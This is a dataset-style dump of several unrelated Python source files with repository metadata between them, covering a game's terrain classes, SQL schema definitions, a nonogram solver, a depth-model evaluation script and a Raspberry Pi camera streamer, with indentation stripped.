x1 = int(input())
break
except:
print("Please enter number")
while True:
try:
y1=int(input())
break
except:
print("Please enter number")
while True:
try:
x2=int(input())
break
except:
print("Please enter number")
while True:
try:
y2=int(input())
break
except:
print("Please enter number")
if (x1+x2)%2==0 and (y1+y2)%2==0:
print("YES")
elif (x1+x2)%2!=0 and (y1+y2)%2!=0:
print("YES")
else:
print("NO")
|
[
"noreply@github.com"
] |
noreply@github.com
|
5991aa7286b2e0849710359d66a0645c362da72d
|
3b3be533e7fd90a84c54693975dd1809a8814e92
|
/terrains.py
|
4dffc6e4808ac39e3c204805f9124af000578d2e
|
[] |
no_license
|
Fenrir127/advance_wars
|
ed9e91013fb7972d39557551b0a7964a255115a1
|
736eecde986111fa15f452f292201d2abb483a4e
|
refs/heads/main
| 2023-03-27T13:21:32.349864
| 2021-03-26T03:14:57
| 2021-03-26T03:14:57
| 304,418,098
| 0
| 0
| null | 2021-02-20T00:02:20
| 2020-10-15T18:41:44
|
Python
|
UTF-8
|
Python
| false
| false
| 9,912
|
py
|
from os import path
from sprites import *
from setting import *
"""
This contains all the information for the different terrain in the game
Nothing should change in there unless there's a way to change terrain in the game which I don't think there is (except building hp)
"""
# This is the master class Terrain which only serves to pass on the function get_mvt_cost()
class Terrain:
def __init__(self, game):
self.game = game
self.terrain_type = None
self.infantry_mvt_cost = None
self.mech_mvt_cost = None
self.tires_mvt_cost = None
self.tread_mvt_cost = None
self.air_mvt_cost = None
self.ship_mvt_cost = None
self.transport_mvt_cost = None
# This function returns the mvt_cost for one of the 7 mvt_type on a given terrain
def get_mvt_cost(self, type):
if type == INFANTRY:
return self.infantry_mvt_cost
elif type == MECH:
return self.mech_mvt_cost
elif type == TIRES:
return self.tires_mvt_cost
elif type == TREAD:
return self.tread_mvt_cost
elif type == AIR:
return self.air_mvt_cost
elif type == SHIP:
return self.ship_mvt_cost
elif type == TRANSPORT:
return self.transport_mvt_cost
else:
print("get_mvt_cost was given the wrong input:")
print(type)
class Plain(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Plain_sprite(game, x, y)
self.name = "Plain"
self.defense = 1
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 2
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class River(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = River_sprite(game, x, y)
self.name = "River"
self.defense = 0
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 2
self.mech_mvt_cost = 1
self.tires_mvt_cost = 0
self.tread_mvt_cost = 0
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class Wood(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Wood_sprite(game, x, y)
self.name = "Wood"
self.defense = 2
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 3
self.tread_mvt_cost = 2
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class Mountain(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Mountain_sprite(game, x, y)
self.name = "Mountain"
self.defense = 4
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 2
self.mech_mvt_cost = 1
self.tires_mvt_cost = 0
self.tread_mvt_cost = 0
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class Sea(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Sea_sprite(game, x, y)
self.name = "Sea"
self.defense = 0
self.type = WATER
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 0
self.mech_mvt_cost = 0
self.tires_mvt_cost = 0
self.tread_mvt_cost = 0
self.air_mvt_cost = 1
self.ship_mvt_cost = 1
self.transport_mvt_cost = 1
class Beach(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Beach_sprite(game, x, y)
self.name = "Sea"
self.defense = 0
self.type = WATER
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 2
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 1
class Road(Terrain):
def __init__(self, game, x, y):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Road_sprite(game, x, y)
self.name = "Road"
self.defense = 0
self.type = LAND
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
class City(Terrain):
def __init__(self, game, x, y, owner):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = City_sprite(game, x, y, owner)
self.name = "City"
self.defense = 3
self.type = BUILDING
self.building_type = LAND
self.hp = 20
self.x = x
self.y = y
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
self.owner = owner
if owner is not None:
self.owner.buildings.append(self)
def add_funds(self):
self.owner.funds += 1000
def new_owner(self, player):
self.owner.buildings.remove(self)
self.sprite.kill()
self.sprite = City_sprite(self.game, self.x, self.y, player)
self.owner = player
self.owner.buildings.append(self)
class Factory(Terrain):
def __init__(self, game, x, y, owner):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Factory_sprite(game, x, y, owner)
self.name = "factory"
self.defense = 3
self.type = BUILDING
self.building_type = LAND
self.hp = 20
self.x = x
self.y = y
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
self.owner = owner
if owner is not None:
self.owner.buildings.append(self)
def add_funds(self):
self.owner.funds += 1000
def new_owner(self, player):
self.owner.buildings.remove(self)
self.sprite.kill()
self.sprite = City_sprite(self.game, self.x, self.y, player)
self.owner = player
self.owner.buildings.append(self)
class HQ(Terrain):
def __init__(self, game, x, y, owner):
super().__init__(game) # the super init doesn't really do anything for now
self.sprite = Hq_sprite(game, x, y, owner)
self.name = "HQ"
self.defense = 4
self.type = BUILDING
self.building_type = LAND
self.hp = 20
self.x = x
self.y = y
# every terrain class must define the mvt cost for all movement types
# when a mvt_type cost is 0, it means units with this type of mvt cannot go on the tile
self.infantry_mvt_cost = 1
self.mech_mvt_cost = 1
self.tires_mvt_cost = 1
self.tread_mvt_cost = 1
self.air_mvt_cost = 1
self.ship_mvt_cost = 0
self.transport_mvt_cost = 0
self.owner = owner
if owner is not None:
self.owner.buildings.append(self)
def add_funds(self):
self.owner.funds += 1000
def new_owner(self, player):
print("You win the game!")
self.game.preview_text.text = ""
self.game.preview_text.text = "You win the game!!!"
self.game.draw()
exit()
|
[
"noreply@github.com"
] |
noreply@github.com
|
92ec94b88e74f9385c3753e035a3676a25f2ecc7
|
6e5c2ba6cd380af56d7714cd6b3ec31b0e0d947e
|
/src/error_single.py
|
082454e4f3df909b97bfed7a7eed20a83a2d8748
|
[] |
no_license
|
luedu/Bokeh-Effect
|
74a0d2b2800a458da9983d377418542bf40d409c
|
f985dd366918f35de92ec118ca0b4783812ad4d6
|
refs/heads/master
| 2022-04-17T12:32:54.975888
| 2020-04-19T14:10:54
| 2020-04-19T14:10:54
| 257,001,932
| 0
| 0
| null | 2020-04-19T13:08:40
| 2020-04-19T13:08:40
| null |
UTF-8
|
Python
| false
| false
| 1,794
|
py
|
import torch
import cv2
import sys
from utils import dice_coeff,dice_loss,normalization,denormalize,ab_rel_diff,sq_rel_diff,rms_linear
import numpy as np
def set_requires_grad(nets, requires_grad=False):
if not isinstance(nets, list):
nets = [nets]
for net in nets:
if net is not None:
for param in net.parameters():
param.requires_grad = requires_grad
modelName = sys.argv[1]
modelType = sys.argv[2]
imagePath = sys.argv[3]
depthMap = sys.argv[4]
image = cv2.resize(cv2.imread(imagePath),(256,256), interpolation=cv2.INTER_CUBIC)
depth = cv2.resize(cv2.imread(depthMap),(256,256), interpolation=cv2.INTER_CUBIC)
image = torch.from_numpy(np.array(image).reshape(1,3,256,256)).float()
depth = torch.from_numpy(np.array(depth).reshape(1,3,256,256)).float()
if modelType == 'c' :
model = torch.load("../CGmodel/"+modelName)
gen = model.G_XtoY
elif modelType == 'p' :
model = torch.load("../P2Pmodel/"+modelName)
gen = model.G
else:
print("Choose a model type from 'c/p'")
exit(1)
set_requires_grad(gen,False)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
image = normalization(image).to(device)
pred_depth = gen.to(device).forward(image)
depth = normalization(depth).to(device)
cv2.imwrite("testDepth.jpg", np.array(denormalize(depth).cpu().detach()).reshape(256,256,3))
pred_depth = denormalize(pred_depth,flag=1)
depth = denormalize(depth,flag=1)
# dice=dice_coeff(pred_depth,depth)
rel_dif = ab_rel_diff(pred_depth,depth)
sq_rel_dif = sq_rel_diff(pred_depth,depth)
rms = rms_linear(pred_depth,depth)
# print("Dice Coefficient is : ", dice)
print("Absolute Relative Difference is : ", rel_dif)
print("Square Relative Difference is : ", sq_rel_dif)
print("RMS Difference is : ", rms)
|
[
"yashkhem1@gmail.com"
] |
yashkhem1@gmail.com
|
c2ae54754ea651fb4d0e578fe907000e3bf0da28
|
f1efbd5d8039e95809ad8d313bd1a9c96d51cbf9
|
/sql_queries.py
|
0bbbb3f48c5d256f37eb83270cec170d4660c9b2
|
[] |
no_license
|
WittmannF/data-engineering-projects-postgres
|
48a7c889133c6d17af825ef4ce1d59e5b6b41e50
|
5b3200c8977d6162d56f40247e8390d028c0ad8c
|
refs/heads/main
| 2023-02-15T18:11:39.796621
| 2021-01-05T21:44:14
| 2021-01-05T21:44:14
| 326,008,955
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,191
|
py
|
# DROP TABLES
songplay_table_drop = "DROP TABLE IF EXISTS songplays;"
user_table_drop = "DROP TABLE IF EXISTS users;"
song_table_drop = "DROP TABLE IF EXISTS songs;"
artist_table_drop = "DROP TABLE IF EXISTS artists;"
time_table_drop = "DROP TABLE IF EXISTS time;"
# CREATE TABLES
songplay_table_create = ("""
CREATE TABLE songplays (
songplay_id SERIAL PRIMARY KEY,
start_time BIGINT NOT NULL,
user_id INT,
level VARCHAR,
song_id VARCHAR,
artist_id VARCHAR,
session_id INT,
location VARCHAR,
user_agent VARCHAR
);
""")
user_table_create = ("""
CREATE TABLE users (
user_id INT PRIMARY KEY,
first_name VARCHAR,
last_name VARCHAR,
gender VARCHAR,
level VARCHAR
);
""")
song_table_create = ("""
CREATE TABLE songs (
song_id VARCHAR PRIMARY KEY,
title VARCHAR,
artist_id VARCHAR NOT NULL,
year INT,
duration FLOAT
);
""")
artist_table_create = ("""
CREATE TABLE artists (
artist_id VARCHAR PRIMARY KEY,
name VARCHAR,
location VARCHAR,
latitude FLOAT,
longitude FLOAT
);
""")
time_table_create = ("""
CREATE TABLE time (
start_time BIGINT PRIMARY KEY,
hour INT,
day INT,
week INT,
month INT,
year INT,
weekday INT
);
""")
# INSERT RECORDS
songplay_table_insert = ("""
INSERT INTO songplays (
start_time,
user_id,
level,
song_id,
artist_id,
session_id,
location,
user_agent)
VALUES ( %s, %s, %s, %s, %s, %s, %s, %s);
""")
user_table_insert = ("""
INSERT INTO users (
user_id,
first_name,
last_name,
gender,
level)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (user_id)
DO UPDATE SET level = EXCLUDED.level;
""")
song_table_insert = ("""
INSERT INTO songs (
song_id,
title,
artist_id,
year,
duration)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (song_id)
DO NOTHING;
""")
artist_table_insert = ("""
INSERT INTO artists (
artist_id,
name,
location,
latitude,
longitude)
VALUES (%s, %s, %s, %s, %s)
ON CONFLICT (artist_id)
DO NOTHING;
""")
time_table_insert = ("""
INSERT INTO time (
start_time,
hour,
day,
week,
month,
year,
weekday)
VALUES (%s, %s, %s, %s, %s, %s, %s)
ON CONFLICT (start_time)
DO NOTHING;
""")
# FIND SONGS
song_select = ("""
SELECT songs.song_id, artists.artist_id
FROM songs INNER JOIN artists ON (songs.artist_id = artists.artist_id)
WHERE songs.title = %s AND artists.name = %s AND songs.duration = %s
;
""")
# QUERY LISTS
create_table_queries = [
songplay_table_create,
user_table_create,
song_table_create,
artist_table_create,
time_table_create
]
drop_table_queries = [
songplay_table_drop,
user_table_drop,
song_table_drop,
artist_table_drop,
time_table_drop
]
|
[
"fernando.wittmann@gmail.com"
] |
fernando.wittmann@gmail.com
|
4c87054e4f6b517be8dae9e5d95da62f3c6a37aa
|
47884bb53ffb293ccfff5e4c808915e00f6cc0d3
|
/archive/timeDelta.py
|
d80a440ffeeba2400e92fbacc59bb5a9a95990b1
|
[] |
no_license
|
andyschultz/Scripts
|
f0b75b537b825fa7ff89efec63299e2a697790f7
|
7d3b57e292ce8f48ac40553a51c052bbc1c975f8
|
refs/heads/master
| 2021-01-13T01:29:40.853048
| 2015-04-30T17:17:08
| 2015-04-30T17:17:08
| 26,029,990
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 583
|
py
|
#!/usr/local/bin/python3
import pandas as pd, numpy as np,sys
file = sys.argv[1]
def buildDelta(file):
df = pd.read_csv(file,sep="\t",index_col=False,skiprows=1)
df.iloc[:,0]= pd.to_datetime(df.iloc[:,0])
df.insert(1,"Cumulative Time","NaN")
df["Cumulative Time"] = (df.iloc[:,0]-df.iloc[:,0].shift()).fillna(0)
df["Cumulative Time"] = df["Cumulative Time"].cumsum(axis=0)
df["Cumulative Time"] = df["Cumulative Time"] / np.timedelta64(1,'h')
df.to_csv(file.rstrip(".txt")+"-delta.txt",index=False,sep="\t")
buildDelta(file)
|
[
"andy.schultz1@gmail.com"
] |
andy.schultz1@gmail.com
|
0da90c73bc71313602b59d4b1cce999930cd4017
|
637669abf38aa06d786458bcb552d0d5dc188302
|
/claripy/ast/__init__.py
|
2da826a5b43d467502f3d34eadb856d283ede3f4
|
[
"BSD-2-Clause"
] |
permissive
|
angr/claripy
|
c5603b52f829a9b29630ed6665ab7ec294cb8157
|
b35449fecd129dc46a0cabdd6499354e89b38a68
|
refs/heads/master
| 2023-09-05T18:48:19.736126
| 2023-09-05T17:17:45
| 2023-09-05T17:17:45
| 40,328,505
| 260
| 115
|
BSD-2-Clause
| 2023-09-11T22:09:06
| 2015-08-06T21:50:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,376
|
py
|
# pylint:disable=redefined-outer-name
from typing import TYPE_CHECKING
# Mypy is severely confused by this delayed import trickery, but works if we just pretend that the import
# happens here already
if TYPE_CHECKING:
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
else:
Bits = lambda *args, **kwargs: None
BV = lambda *args, **kwargs: None
VS = lambda *args, **kwargs: None
FP = lambda *args, **kwargs: None
Bool = lambda *args, **kwargs: None
Int = lambda *args, **kwargs: None
Base = lambda *args, **kwargs: None
true = lambda *args, **kwargs: None
false = lambda *args, **kwargs: None
String = lambda *args, **kwargs: None
all_operations = None
def _import():
global Bits, BV, VS, FP, Bool, Int, Base, String, true, false, all_operations
from .bits import Bits
from .bv import BV
from .vs import VS
from .fp import FP
from .bool import Bool, true, false
from .int import Int
from .base import Base
from .strings import String
from .. import ops as all_operations
__all__ = ("Bits", "BV", "VS", "FP", "Bool", "true", "false", "Int", "Base", "String", "all_operations")
|
[
"noreply@github.com"
] |
noreply@github.com
|
4770757cc653f027b500d6f75168f8318a702d86
|
7f2612e5132e1583e5ba9758f299a8f301f0dc70
|
/FB/5-longest-palindromic-substring.py
|
fb44ee0f8a6db9b0e87b7abf9cf4a48bd884a73a
|
[] |
no_license
|
taeheechoi/coding-practice
|
380e263a26ed4de9e542c51e3baa54315127ae4f
|
9528b5e85b0ea2960c994ffea62b5be86481dc38
|
refs/heads/main
| 2022-07-09T11:22:18.619712
| 2022-06-28T14:55:51
| 2022-06-28T14:55:51
| 447,082,854
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 426
|
py
|
class Solution:
# Time O(N^2) Space O(1)
def longestPalindrome(self, s):
res = ''
for i in range(len(s)):
odd = self.is_pal(s, i, i)
even = self.is_pal(s, i, i+1)
res = max(odd, even, res, key=len)
return res
def is_pal(self, s, l, r):
while l >= 0 and r < len(s) and s[l] == s[r]:
l -= 1
r += 1
return s[l+1: r]
|
[
"dadac76@hotmail.com"
] |
dadac76@hotmail.com
|
593c5efa70cba81b2a1c8e74a4bd3a4e8bf6c73c
|
1bf512659c750eba27896ad5d1a5ad61fe08c0e4
|
/musicrest/apps/api/models.py
|
79348bd25ffd3e745eb1e479628b244e86f1bfc0
|
[] |
no_license
|
jeremyhilado/python-django-mini-project
|
fc80976e8576aa1eab9269521131107936bf8502
|
492e301e80266f1a44ba8ba3e5649af4992c836e
|
refs/heads/master
| 2023-08-17T19:43:03.052514
| 2020-06-06T18:13:33
| 2020-06-06T18:13:33
| 261,493,243
| 0
| 0
| null | 2021-09-22T18:58:26
| 2020-05-05T14:22:20
|
Python
|
UTF-8
|
Python
| false
| false
| 535
|
py
|
from django.db import models
from apps.authentication.models import User
# Create your models here.
class Artist(models.Model):
name = models.CharField(max_length=255)
genre = models.CharField(max_length=255)
biography = models.TextField(blank=True)
created_at = models.DateTimeField(auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True)
owner = models.ForeignKey(User, on_delete=models.CASCADE)
is_public = models.BooleanField(default=True)
def __str__(self):
return self.name
|
[
"jhilado89@gmail.com"
] |
jhilado89@gmail.com
|
d3b5e095fa1dab8e9c98895fa11a48312d856b56
|
874f46f4510b321ec3110ac8d5d5e572175c5544
|
/Generator_Tests/TestFrec/scripts/generator.py
|
94df7463f40e16990b3f6614572ff87accc2eb5a
|
[] |
no_license
|
JordiEspinozaMendoza/Simulacion
|
bb271aee0908693ff0e36470dae98216096d9066
|
fac1cdf5010a34a853a8b13d93209bcbde616e64
|
refs/heads/main
| 2023-05-31T14:06:21.329271
| 2021-06-14T02:52:06
| 2021-06-14T02:52:06
| 367,148,203
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,014
|
py
|
import sys
import os
import pandas as pd
sys.setrecursionlimit(5000)
# X = Semilla
# a = Multiplicador
# c = Constante aditiva
# m = Modulo
def Operacion(X, a, c, m):
Resi = ((a*X)+c) % m
return Resi
def createDataFrame(data):
df = pd.DataFrame(data, columns=["n","Xn","Xn+1","Rn"])
cols = list(df.columns)
return df.to_string(), df, cols
def Recursivo(self, X0, a, c, m, conta,Detener, ArraySemilla, data):
try:
for Semilla in ArraySemilla:
if X0==Semilla:
Detener = True
if Detener==True or conta==325:
pass
else:
data["n"].append(conta+1)
data["Xn"].append(X0)
data["Xn+1"].append(Operacion(X0,a,c,m))
data["Rn"].append(Operacion(X0,a,c,m)/m)
conta = conta + 1
ArraySemilla.append(X0)
Recursivo(Operacion(X0,a,c,m),a,c,m,conta,Detener, ArraySemilla, data)
except Exception as e:
print(str(e))
|
[
"jordi8101@gmail.com"
] |
jordi8101@gmail.com
|
64cba2c2b0ca9bb48817b6596678847d35379587
|
2428f771974183f86dd76a5ab9621097bba85d4e
|
/solve.py
|
28c74e44d34b35b2770e55b9d057a465143ad34e
|
[] |
no_license
|
Oripy/nonogram-solver
|
3bdcffd282e49b117a10e475b65734e6ae23fa09
|
d81b79caac04f8666bc39cba2a8fe95e592ab9e3
|
refs/heads/master
| 2021-01-15T16:00:47.186485
| 2011-07-18T08:40:48
| 2011-07-18T08:40:48
| 3,313,624
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,922
|
py
|
#!/usr/bin/env python
import sys
import string
import copy
import types
from data_diff import data_diff
def get_permutations(counts, length):
"""
>>> get_permutations([], 1)
[[False]]
>>> get_permutations([1], 1)
[[True]]
>>> get_permutations([2], 3)
[[True, True, False], [False, True, True]]
>>> get_permutations([2], 4)
[[True, True, False, False], [False, True, True, False], [False, False, True, True]]
>>> get_permutations([1, 1], 4)
[[True, False, True, False], [True, False, False, True], [False, True, False, True]]
>>> get_permutations([1, 2], 5)
[[True, False, True, True, False], [True, False, False, True, True], [False, True, False, True, True]]
>>> get_permutations([1, 1, 2], 7)
[[True, False, True, False, True, True, False], [True, False, True, False, False, True, True], [True, False, False, True, False, True, True], [False, True, False, True, False, True, True]]
"""
if len(counts) == 0:
row = []
for x in xrange(length):
row.append(False)
return [row]
permutations = []
for start in xrange(length - counts[0] + 1):
permutation = []
for x in xrange(start):
permutation.append(False)
for x in xrange(start, start + counts[0]):
permutation.append(True)
x = start + counts[0]
if x < length:
permutation.append(False)
x += 1
if x == length and len(counts) == 0:
permutations.append(permutation)
break
sub_start = x
sub_rows = get_permutations(counts[1:len(counts)], length - sub_start)
for sub_row in sub_rows:
sub_permutation = copy.deepcopy(permutation)
for x in xrange(sub_start, length):
sub_permutation.append(sub_row[x-sub_start])
permutations.append(sub_permutation)
return permutations
def solve_row(counts, row):
"""
>>> solve_row([], [None])
[False]
>>> solve_row([1], [None])
[True]
>>> solve_row([2], [False, None, None])
[False, True, True]
>>> solve_row([2], [True, None, None])
[True, True, False]
>>> solve_row([2], [None, None, None])
[None, True, None]
>>> solve_row([2], [None, False, None, None])
[False, False, True, True]
>>> solve_row([2], [None, False, None, None, None, None])
[False, False, None, None, None, None]
row already completed:
>>> solve_row([1], [None, True, None])
[False, True, False]
too far away to be able to complete
>>> solve_row([2], [None, True, None, None])
[None, True, None, False]
assume positions of all except one count
>>> solve_row([1, 2], [None, None, None, None, None])
[None, None, None, True, None]
>>> solve_row([1, 1, 1, 2], [None, None, None, None, None, None, None, None, None])
[None, None, None, None, None, None, None, True, None]
>>> solve_row([1, 7], [None, False, True, None, None, None, None, None, None, None])
[True, False, True, True, True, True, True, True, True, False]
doesn't fit on one size of False
>>> solve_row([1, 1], [None, False, None, None])
[True, False, None, None]
doesn't fit on one size of False
>>> solve_row([1, 2], [None, None, False, None, None, None])
[None, None, False, None, True, None]
already started on one side of False
>>> solve_row([4], [None, None, None, None, False, None, True, None, None, None])
[False, False, False, False, False, None, True, True, True, None]
"""
permutations = get_permutations(counts, len(row))
valid_permutations = []
for permutation in permutations:
valid = True
for x in xrange(len(row)):
if row[x] != None and row[x] != permutation[x]:
valid = False
if valid:
valid_permutations.append(permutation)
new_row = copy.deepcopy(valid_permutations[0])
for permutation in valid_permutations:
for x in xrange(len(row)):
if new_row[x] != permutation[x]:
new_row[x] = None
return new_row
def solve(row_counts, col_counts, grid):
width = len(grid[0])
height = len(grid)
changed = True
while changed:
changed = False
for x in xrange(width):
col = []
for y in xrange(height):
col.append(grid[y][x])
col = solve_row(col_counts[x], col)
for y in xrange(height):
if col[y] != None and grid[y][x] != col[y]:
changed = True
grid[y][x] = col[y]
for y in xrange(height):
row = copy.deepcopy(grid[y])
row = solve_row(row_counts[y], row)
for x in xrange(1):
if row[x] != None and grid[y][x] != row[x]:
changed = True
grid[y] = row
return grid
def check_solution(grid):
row_counts = []
col_counts = []
for y in xrange(len(grid)):
row_counts.append([0])
for x in xrange(len(grid[0])):
col_counts.append([0])
for y in xrange(len(grid)):
for x in xrange(len(grid[0])):
if grid[y][x] == True:
row_counts[y][-1] += 1
col_counts[x][-1] += 1
elif grid[y][x] == False:
if row_counts[y][-1] != 0:
row_counts[y].append(0)
if col_counts[x][-1] != 0:
col_counts[x].append(0)
for y in xrange(len(grid)):
if row_counts[y][-1] == 0:
row_counts[y].pop()
for x in xrange(len(grid[0])):
if col_counts[x][-1] == 0:
col_counts[x].pop()
return [row_counts, col_counts]
def solve_from_file(filename):
f = open(filename)
lines = f.readlines()
#convert into a list of lists and remove whitespace
grid = []
width = 0
for line in lines:
line = line.rstrip()
if line:
row = string.split(line, "\t")
width = max(width, len(row))
grid.append(row)
height = len(grid)
#convert into integers and normalize row width
y = 0
for row in grid:
new_row = []
for x in xrange(width):
try:
i = int(row[x])
except IndexError:
i = None
except ValueError:
if row[x] == 'T':
i = True
elif row[x] == 'F':
i = False
else:
i = None
new_row.append(i)
grid[y] = new_row
y += 1
#measure height and width of inner grid
x = width - 1
y = height - 1
while x >= 0:
if type(grid[y][x]) == types.IntType:
break
x -= 1
inner_width = width - x - 1
x = width - 1
y = height - 1
while y >= 0:
if type(grid[y][x]) == types.IntType:
break
y -= 1
inner_height = len(grid) - y - 1
print "board size: %dx%d" % (inner_width, inner_height)
#ensure inner grid is valid
for x in xrange(width - inner_width, width):
for y in xrange(height - inner_height, height):
if type(grid[y][x]) != types.NoneType and type(grid[y][x]) != types.BooleanType:
print 'invalid board'
exit()
#ensure upper left is empty
for x in xrange(width - inner_width):
for y in xrange(height - inner_height):
if grid[y][x] != None:
print 'invalid board'
exit()
counts_width = width - inner_width
counts_height = height - inner_height
#populate row counts
row_counts = []
for y in xrange(counts_height, height):
counts = []
for x in xrange(counts_width):
count = grid[y][x]
if count:
counts.append(count)
row_counts.append(counts)
#populate column counts
col_counts = []
for x in xrange(counts_width, width):
counts = []
for y in xrange(counts_height):
count = grid[y][x]
if count:
counts.append(count)
col_counts.append(counts)
#redo grid
width = inner_width
height = inner_height
inner_grid = []
for y in xrange(height):
inner_grid.append([])
for x in xrange(width):
inner_grid[y].append(grid[y+counts_height][x+counts_width])
grid = solve(row_counts, col_counts, inner_grid)
complete = True
for row in grid:
for item in row:
if item == None:
complete = False
if complete:
l = check_solution(grid)
if data_diff(l[0], row_counts) or data_diff(l[1], col_counts):
print 'FAIL!'
exit()
for y in xrange(counts_height):
for x in xrange(counts_width):
sys.stdout.write("\t")
for counts in col_counts:
try:
sys.stdout.write(str(counts[-counts_height+y]))
except:
pass
sys.stdout.write("\t")
print
y = 0
for row in grid:
for x in xrange(counts_width):
try:
sys.stdout.write(str(row_counts[y][-counts_width+x]))
except:
pass
sys.stdout.write("\t")
for square in row:
if square == True:
sys.stdout.write('T')
elif square == False:
sys.stdout.write('F')
sys.stdout.write("\t")
print
y += 1
if __name__ == "__main__":
if len(sys.argv) > 1:
solve_from_file(sys.argv[1])
else:
import doctest
doctest.testmod()
|
[
"repalviglator@yahoo.com"
] |
repalviglator@yahoo.com
|
5d8cfdb679b337f26330b1c109a88a1680180caf
|
d569476dd95496339c34b231621ff1f5dfd7fe49
|
/PyTest/SteamSender/tests/test_send_cards.py
|
996577a1586476bfeec33e7f74f1ba41cfd2b17e
|
[] |
no_license
|
monteua/Tests
|
10f21f9bae027ce1763c73e2ea7edaf436140eae
|
553e5f644466683046ea180422727ccb37967b98
|
refs/heads/master
| 2021-01-23T10:28:49.654273
| 2018-05-09T09:11:30
| 2018-05-09T09:11:30
| 93,061,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 494
|
py
|
from PageObject.SteamActions import SteamHome
from accounts import accounts
accounts_list = accounts()
def test_send_trade(driver):
for login in accounts_list:
if login == 'monte_ua13':
password = ""
else:
password = ""
SteamHome(driver).open_browser()
SteamHome(driver).enter_credentials(login, password)
SteamHome(driver).pass_steam_guard()
SteamHome(driver).open_trade_url()
SteamHome(driver).log_off()
|
[
"arximed.monte@gmail.com"
] |
arximed.monte@gmail.com
|
e886796a357ded12e7a87bd69fcd9177507e8a8b
|
348d736636ddc3490df1b47fafbe26d10124148e
|
/camera_pi.py
|
d502e24cc78b9b0ae47ee12cd1dd097b5bc64041
|
[] |
no_license
|
HensonZl/hackrfpibot
|
2636fbf19627913ddc754f5acc89d866612cb672
|
4eb730f5add931d0d26f2ec1177994dee5417012
|
refs/heads/master
| 2020-05-18T13:11:47.446115
| 2019-05-01T21:57:28
| 2019-05-01T21:57:28
| 184,431,429
| 16
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,986
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# camera_pi.py
#
# NOT MY SCRIPT this was used from https://www.hackster.io/ruchir1674/video-streaming-on-flask-server-using-rpi-ef3d75
# Look at the above link to get the documentation for the following script.
import time
import io
import threading
import picamera
class Camera(object):
thread = None # background thread that reads frames from camera
frame = None # current frame is stored here by background thread
last_access = 0 # time of last client access to the camera
def initialize(self):
if Camera.thread is None:
# start background frame thread
Camera.thread = threading.Thread(target=self._thread)
Camera.thread.start()
# wait until frames start to be available
while self.frame is None:
time.sleep(0)
def get_frame(self):
Camera.last_access = time.time()
self.initialize()
return self.frame
@classmethod
def _thread(cls):
with picamera.PiCamera() as camera:
# camera setup
camera.resolution = (320, 240)
camera.hflip = True
camera.vflip = True
